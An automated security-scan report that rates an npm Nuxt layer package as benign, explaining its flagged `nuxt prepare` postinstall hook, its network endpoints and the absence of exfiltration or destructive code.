AI Security Review
scanned 7h ago · by lpm-firewall-aiNo confirmed malicious attack surface. The install-time hook runs Nuxt's standard prepare step for a Nuxt layer, and runtime network/credential handling is aligned with the app's documented backend workflows.
Static reason
One or more suspicious static signals were detected.
Trigger
npm postinstall or user running the SPA
Impact
No credential exfiltration, persistence, destructive behavior, or foreign AI-agent control-surface mutation identified
Mechanism
Nuxt layer configuration and browser API client
Rationale
Static inspection shows a large Nuxt SPA layer with a standard `nuxt prepare` postinstall and package-aligned client API/WebSocket code. Suspicious scanner labels are explained by normal frontend networking, auth/session handling, and user-invoked credential storage flows, with no concrete malicious chain.
Evidence
package.jsonnuxt.config.tsapp/composables/useApi.tsapp/composables/api/client.tsapp/composables/useWorkspaceStream.tsapp/stores/auth.tsapp/stores/personalSubscriptions.ts
Network endpoints5
localhost:8787github.com/settings/tokens/newgitlab.com/-/user_settings/personal_access_tokensgithub.comopenrouter.ai/keys
Decision evidence
public snapshotAI called this Clean at 94.0% confidence as Benign with low false-positive risk.
Evidence for block
- package.json defines postinstall: nuxt prepare
Evidence against
- package.json has no bin and main is nuxt.config.ts for a Nuxt layer
- nuxt.config.ts only configures Nuxt modules, i18n, CSS paths, and local default apiBase
- No package files or binaries for preinstall/install payloads found
- No child_process, eval/vm/Function, native addon, or filesystem write/delete primitives found in package source
- Network code is SPA client behavior to configured cat-factory backend and user-facing OAuth/provider URLs
- Secrets/tokens are submitted to configured backend APIs or cached locally for app workflow; no exfiltration endpoint found
Behavioral surface
ChildProcessFilesystemNetworkWebSocket
UrlStrings
NoLicense
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.postinstall = nuxt prepare
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.postinstall = nuxt prepare
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High2 Medium4 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
MediumNetwork
LowScripts Present
LowFilesystem
LowUrl Strings
LowNo License